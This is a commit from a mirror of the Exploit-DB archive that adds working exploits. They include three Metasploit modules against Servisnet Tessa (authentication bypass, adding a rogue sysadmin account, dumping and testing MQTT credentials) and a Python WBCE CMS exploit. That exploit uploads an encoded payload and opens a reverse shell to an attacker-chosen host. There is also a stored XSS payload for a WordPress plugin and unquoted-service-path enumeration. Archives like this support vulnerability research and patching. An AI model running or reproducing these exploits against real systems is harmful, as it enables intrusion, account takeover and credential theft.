bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-02-05

Browse source 
8 changes to exploits/shellcodes

FLAME II MODEM USB - Unquoted Service Path
WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)
Servisnet Tessa - Privilege Escalation (Metasploit)
Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)
Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)

Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)
Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)
This commit is contained in:
Offensive Security 2022-02-05 05:01:59 +00:00
parent ad453a2c73
commit 30be173453
10 changed files with 1137 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

240
exploits/multiple/webapps/50712.rb Executable file
View file

@ -0,0 +1,240 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',
'Description' => %q(
This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization .
An API request to "/data-service/users/[userid]" with any low-authority user returns other users' information in response.
The encrypted password information is included here, but privilage escelation is possible with the active sessionid value.
var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');
The logic required for the Authorization header is as above.
Therefore, after accessing an authorized user ID value and active sessionId value,
if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added.
),
'References' =>
[
[ 'CVE', 'CVE-2022-22832' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],
[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 22 2021",
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptString.new('USERNAME', [true, 'Servisnet Username']),
OptString.new('PASSWORD', [true, 'Servisnet Password']),
OptString.new('TARGETURI', [true, 'Base path for application', '/'])
])
end
# split strings to salt
def split(data, string_to_split)
word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string
end
# split JSONs to salt
def splitJSON(data, string_to_split)
word = data.scan(/"#{string_to_split}":"([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string
end
# split JSONs to salt none "
def splitJSON2(data, string_to_split)
word = data.scan(/"#{string_to_split}":([\S\s]*?),/)[0]
string = word.split('"]').join('').split('["').join('')
return string
end
def app_path
res = send_request_cgi({
# default.a.get( check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /baseURL/
data = res.body
#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
return base_url
else
fail_with(Failure::NotVulnerable, 'baseURL not found!')
end
end
def add_user(token, app_path)
newuser = Rex::Text.rand_text_alpha_lower(8)
id = Rex::Text.rand_text_numeric(4)
# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, app_path, 'users'),
'headers' =>
{
'Authorization' => token
},
'data' => json_data
})
if res && res.code == 200 && res.body =~ /localhost/
print_good("The sysAdmin authorized user has been successfully added.")
print_status("Username: #{newuser}")
print_status("Password: 1111111111")
else
fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
end
end
def sessionid_check
res = send_request_cgi({
# user.usersessionid check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /user.usersessionid/
return Exploit::CheckCode::Vulnerable
else
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
end
def find_admin(token, userid, app_path)
res = send_request_cgi({
# token check
'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
'headers' =>
{
'Authorization' => token
},
'method' => 'GET'
})
if not res && res.code == 200 && res.body =~ /usersessionid/
fail_with(Failure::NotVulnerable, 'An error occurred while use Token. Try again.')
end
loopid = userid.to_i
$i = 0
# The admin userid must be less than the low-authority userid.
while $i < loopid do
$i +=1
res = send_request_cgi({
# token check
'uri' => normalize_uri(target_uri.path, app_path, 'users', $i),
'headers' =>
{
'Authorization' => token
},
'method' => 'GET'
})
if res.code == 200 and res.body.include? '"Sistem Admin"'
admin_uname = splitJSON(res.body, 'username')
admin_sessid = splitJSON(res.body, 'usersessionid')
admin_userid = splitJSON2(res.body, 'id')
enc_token = Rex::Text.encode_base64('' + admin_uname + ':' + admin_sessid + '')
token_admin = 'Basic ' + enc_token + ''
print_good("Excellent! Admin user found.")
print_good("Admin Username: #{admin_uname}")
print_good("Admin SessionId: #{admin_sessid}")
if session_check(token_admin, admin_userid, admin_uname) == "OK"
break
end
end
end
end
def session_check(token, userid, user)
res = send_request_cgi({
# session check
'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
'headers' =>
{
'Authorization' => token
},
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /managers_codes/
print_good("Admin session is active.")
add_user(token, app_path)
return "OK"
else
print_status("Admin user #{user} is not online. Try again later.")
return "NOT"
end
end
def login_check(user, pass)
json_data = '{"username": "' + user + '", "password": "' + pass + '"}'
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, app_path, 'api', 'auth', 'signin'),
'data' => json_data
})
if res && res.code == 200 && res.body =~ /usersessionid/
sessid = splitJSON(res.body, 'usersessionid')
userid = splitJSON2(res.body, 'id')
print_status("Sessionid: #{sessid}")
print_status("Userid: #{userid}")
enc_token = Rex::Text.encode_base64('' + user + ':' + sessid + '')
token = 'Basic ' + enc_token + ''
print_status("Authorization: #{token}")
find_admin(token, userid, app_path)
else
fail_with(Failure::NotVulnerable, 'An error occurred while login. Try again.')
end
end
def check
if sessionid_check
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
login_check(datastore['USERNAME'], datastore['PASSWORD'])
end
end

169
exploits/multiple/webapps/50713.rb Executable file
View file

@ -0,0 +1,169 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::MQTT
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
'Description' => %q(
This module exploits MQTT creds dump vulnerability in Servisnet Tessa.
The app.js is publicly available which acts as the backend of the application.
By exposing a default value for the "Authorization" HTTP header,
it is possible to make unauthenticated requests to some areas of the application.
Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
A new admin user can be added to the database with this header obtained in the source code.
The module tries to log in to the MQTT service with the credentials it has obtained,
and reflects the response it receives from the service.
),
'References' =>
[
[ 'CVE', 'CVE-2022-22833' ],
[ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 22 2021",
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptString.new('TARGETURI', [true, 'Base path for application', '/'])
])
end
# split strings to salt
def split(data, string_to_split)
word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string
end
def check_mqtt
res = send_request_cgi({
# default.a.get( check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /connectionMQTT/
data = res.body
#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
rhost = mqtt_host.split('mqtts://').join('')
print_status("MQTT Host: #{mqtt_host}")
mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]
print_status("MQTT Port: #{mqtt_port}")
mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
print_status("MQTT Endpoint: #{mqtt_end}")
mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
print_status("MQTT clientId: #{mqtt_cl}")
mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
print_status("MQTT username: #{mqtt_usr}")
mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
print_status("MQTT password: #{mqtt_pass}")
print_status("##### Starting MQTT login sweep #####")
# Removed brute force materials that can be included for the collection.
cred_collection = Metasploit::Framework::CredentialCollection.new(
password: mqtt_pass,
username: mqtt_usr
)
# this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
cred_collection = prepend_db_passwords(cred_collection)
scanner = Metasploit::Framework::LoginScanner::MQTT.new(
host: rhost,
port: mqtt_port,
read_timeout: datastore['READ_TIMEOUT'],
client_id: client_id,
proxies: datastore['PROXIES'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: datastore['ConnectTimeout'],
max_send_size: datastore['TCP::max_send_size'],
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
ssl: datastore['SSL'],
ssl_version: datastore['SSLVersion'],
ssl_verify_mode: datastore['SSLVerifyMode'],
ssl_cipher: datastore['SSLCipher'],
local_port: datastore['CPORT'],
local_host: datastore['CHOST']
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: fullname,
workspace_id: myworkspace_id
)
password = result.credential.private
username = result.credential.public
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
print_good("MQTT Login Successful: #{username}/#{password}")
else
invalidate_login(credential_data)
vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
end
end
end
end
def auth_bypass
res = send_request_cgi({
# default.a.defaults.headers.post["Authorization"] check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
token = split(res.body, 'Authorization')
print_status("Authorization: #{token}")
return token
else
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
end
def check
if auth_bypass =~ /Basic/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
check_mqtt
end
end

131
exploits/multiple/webapps/50714.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
'Description' => %q(
This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.
The app.js is publicly available which acts as the backend of the application.
By exposing a default value for the "Authorization" HTTP header,
it is possible to make unauthenticated requests to some areas of the application.
Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
A new admin user can be added to the database with this header obtained in the source code.
),
'References' =>
[
[ 'CVE', 'CVE-2022-22831' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 22 2021",
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
}
))
register_options([
OptString.new('TARGETURI', [true, 'Base path for application', '/'])
])
end
# split strings to salt
def split(data, string_to_split)
word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
string = word.split('"]').join('').split('["').join('')
return string
end
# for Origin and Referer headers
def app_path
res = send_request_cgi({
# default.a.get( check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /baseURL/
data = res.body
#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
print_status("baseURL: #{base_url}")
return base_url
else
fail_with(Failure::NotVulnerable, 'baseURL not found!')
end
end
def add_user
token = auth_bypass
newuser = Rex::Text.rand_text_alpha_lower(8)
id = Rex::Text.rand_text_numeric(4)
# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, app_path, 'users'),
'headers' =>
{
'Authorization' => token
},
'data' => json_data
})
if res && res.code == 200 && res.body =~ /localhost/
print_good("The sysAdmin authorized user has been successfully added.")
print_status("Username: #{newuser}")
print_status("Password: 1111111111")
else
fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
end
end
def auth_bypass
res = send_request_cgi({
# default.a.defaults.headers.post["Authorization"] check
'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
token = split(res.body, 'Authorization')
print_status("Authorization: #{token}")
return token
else
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
end
def check
if auth_bypass =~ /Basic/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
add_user
end
end

108
exploits/php/webapps/50707.py Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/01/2022
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: 1.5.2
# Tested on: Linux - PHP Version: 8.0.14
# Github repo: https://github.com/WBCE/WBCE_CMS
# -*- coding: utf-8 -*-
#/usr/bin/env python
import requests
import string
import base64
import argparse
import time
import io
from bs4 import BeautifulSoup #pip install beautifulsoup4
PAYLOAD = 'UEsDBBQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMAAAAdDE4YmtuZXYucGhwhVVtT9swEP6OxH8wUaQmUqAJ24epUSYh6CY0CbQC2weGIje5UKuJndkOhSH++85OQqqqtBIizr08eZ6783U8nujoy3zJ4enwAF8ODxToVLMK0pJVTHuhH7u/prOby+urxIlOQid2WZ246Wz68256c3vvSHhKWe08xG4tpN70GJvxZYuGL1PF/kESfQ7D2F1JpiGlCW/KMnZBSiHf39QCyjIZNZxWQI5pTFYxYXlMxnPGx2pBjtkodnMKleBJiCeYN494YIVXNDzTTPAUnpnSyhvVGddlWgi5HPn+q1uzPBlMnm9yrDE5jvzXWjKuUbMznc2uZxNyTvlIExPp+DE8oyfy47cuxX+1lrC11EKx51SBViz3/E04o66H62PWIXsxUfwGpQIypP4+m11dXn2fkG+UlZATLUgbyxScEHK7YIrg39+GaSCZqNBDKM8JF0icalqeOIifLXImPWeM56aiamm7qkS2TArzX9TAPWxrYFsYmG5wYR9Ky+BTaMt0ZBPWVHV+4rXxG4JAZZLVWkhVQ5ZQKemLFyZf24NTsxqcwJGOH0SbxhUaT7cYkXItRQZKJeaZWtbtrAQb3wtck6Za3kylEpRoZAZej+B/1GxV0xUnFnRdD+oEWpn+pvMSy8D4o9d+4z58CLBAOwKifQGnHwbYkhvnO9mbJjP8C7wnL8RUAHKC9wykgpa1mRBs5cS2EiWsFqwE1PBqbgeIosXcov/GZmeCc7BXiGiQFeNUQ44wcyS3jN86kEHah0BdobeiuPjIU9pORSdyKNZ7VbDhvKnSbEH5I+SpCQOtkvdClUjU67CCfqEE/S4JzC6xE8B4uv6lLsO3JWmXhz/U9/r8B5lNzy6Qrct43eikMPF97rDHEHp7+oS0iYhQWFJrk9J6cKDWaQ3Sd1O7vbi+u91GbkDYT9CCbKFo5O2kd7qfHg7ALnqnu+kNIHvpvRVZKVRnxiD7NpR50xJtWuxw2SVircNaiPsfENJTcpXG06OVfNTt6W7mnc73hztI6fBAgm4kJ2H8H1BLAQI/ABQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMACQAAAAAAAAAIAAAAAAAAAB0MThia25ldi5waHAKACAAAAAAAAEAGACAuZAFVv7XAYC5kAVW/tcB6Bk8KTf+1wFQSwUGAAAAAAEAAQBeAAAALgMAAAAA'
def main():
parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)')
parser.add_argument('-x', '--url', type=str, required=True)
parser.add_argument('-u', '--user', type=str, required=False)
parser.add_argument('-p', '--password', type=str, required=False)
parser.add_argument('-ah', '--attacker_host', type=str, required=False)
parser.add_argument('-ap', '--attacker_port', type=str, required=False)
args = parser.parse_args()
print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
exploit(args, PAYLOAD)
def exploit(args, payload):
s2 = requests.Session()
#login
body= {'url':'','username_fieldname':'username_t18bknev','password_fieldname':'password_t18bknev','username_t18bknev':args.user,'password_t18bknev':args.password}
r = s2.post(args.url+'/admin/login/index.php', data=body, allow_redirects=False)
if(r.status_code==302 and r.headers['location'].find('/start/') != -1):
print("[*] Login OK")
else:
print("[*] Login Failed")
exit(1)
time.sleep(1)
#create droplet
up = {'userfile':('t18bknev.zip', io.BytesIO(base64.b64decode(PAYLOAD)), "multipart/form-data")}
r = s2.post(args.url+'/admin/admintools/tool.php?tool=droplets&upload=1', files=up)
if(r.status_code==200 and r.text.find('1 Droplet(s) imported') != -1):
print("[*] Droplet OK")
else:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
#get csrf token
r = s2.get(args.url+'/admin/pages/index.php')
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'formtoken'})['value']
#create page
body= {'formtoken':formtoken,'title':'t18bknev','type':'wysiwyg','parent':'0','visibility':'public','save':''}
r = s2.post(args.url+'/admin/pages/add.php', data=body, allow_redirects=False)
soup = BeautifulSoup(r.text, 'html.parser')
try:
page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1]
print("[*] Page OK ["+page_id+"]")
except:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
#get csrf token
print("[*] Getting token")
r = s2.get(args.url+'/admin/pages/modify.php?page_id='+page_id)
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'formtoken'})['value']
section_id = soup.find('input', {'name':'section_id'})['value']
time.sleep(1)
#add droplet to page
body= {'page_id':page_id,'formtoken':formtoken,'section_id':section_id,'content'+section_id:'[[t18bknev]]','modify':'save'}
r = s2.post(args.url+'/modules/wysiwyg/save.php', data=body, allow_redirects=False)
if(r.status_code==200 and r.text.find('Page saved') != -1):
print("[*] Adding droplet OK")
else:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
input("Please make sure that your nc listner is ready...\n\nPRESS ENTER WHEN READY")
body= {'rev_ip':args.attacker_host,'rev_port':args.attacker_port}
r = s2.post(args.url+'/pages/t18bknev.php', data=body, allow_redirects=False)
if(r.status_code==200):
print("[*] Exploit OK - check your listner")
exit(0)
else:
print("[*] Exploit Failed")
exit(1)
if __name__ == '__main__':
main()

28
exploits/php/webapps/50709.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 02-02-2022
# Exploit Author: Ahmet Serkan Ari
# Software Link: https://wordpress.org/plugins/ip2location-country-blocker/
# Version: 2.26.7
# Tested on: Linux
# CVE: N/A
# Thanks: Ceylan Bozogullarindan
# Description:
IP2Location Country Blocker is a plugin enables user to block unwanted traffic from accesing Wordpress frontend (blog pages) or backend (admin area) by countries or proxy servers. It helps to reduce spam and unwanted sign ups easily by preventing unwanted visitors from browsing a particular page or entire website.
An authenticated user is able to inject arbitrary Javascript or HTML code to the "Frontend Settings" interface available in settings page of the plugin (Country Blocker), due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin versions prior to 2.26.7 are affected by this vulnerability.
The details of the discovery are given below.
# Steps To Reproduce:
1. Install and activate the IP2Location Country Blocker plugin.
2. Visit the "Frontend Settings" interface available in settings page of the plugin that is named "Country Blocker".
3. Check the "Enable Frontend Blocking" option.
4. Choose the "URL" option for the "Display page when visitor is blocked" setting.
5. Type the payload given below to the "URL" input where is in the "Other Settings" area.
http://country-blocker-testing.com/test#"'><script>alert(document.domain)</script>
6. Click the "Save Changes" button.
7. The XSS will be triggered on the settings page when every visit of an authenticated user.

26
exploits/windows/local/50708.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: FLAME II MODEM USB - Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-02-2022
# Vendor Homepage: https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a
# Software Links : N/A (Is a BAM)
# Tested Version: N/A
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 BITS
C:>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
FLAME II HSPA USB MODEM Service FLAME II HSPA USB MODEM Service C:\Program Files (x86)\Internet Telcel\ApplicationController.exe Auto
C:>sc qc "FLAME II HSPA USB MODEM Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: FLAME II HSPA USB MODEM Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Internet Telcel\ApplicationController.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : FLAME II HSPA USB MODEM Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

6
files_exploits.csv
View file

@ -11437,6 +11437,7 @@ id,file,description,date,author,type,platform,port
50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux, 50689,exploits/linux/local/50689.txt,"PolicyKit-1 0.105-31 - Privilege Escalation",1970-01-01,"Lance Biggerstaff",local,linux,
50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows, 50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows,
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos, 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos,
50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44784,3 +44785,8 @@ id,file,description,date,author,type,platform,port
50704,exploits/php/webapps/50704.txt,"WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50704,exploits/php/webapps/50704.txt,"WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50705,exploits/php/webapps/50705.txt,"WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50705,exploits/php/webapps/50705.txt,"WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50706,exploits/php/webapps/50706.txt,"WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php, 50706,exploits/php/webapps/50706.txt,"WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Antonio Cuomo",webapps,php,
50709,exploits/php/webapps/50709.txt,"WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Ahmet Serkan Ari",webapps,php,
50712,exploits/multiple/webapps/50712.rb,"Servisnet Tessa - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
50713,exploits/multiple/webapps/50713.rb,"Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
50714,exploits/multiple/webapps/50714.rb,"Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)",1970-01-01,AkkuS,webapps,multiple,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -1043,3 +1043,5 @@ id,file,description,date,author,type,platform
50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86
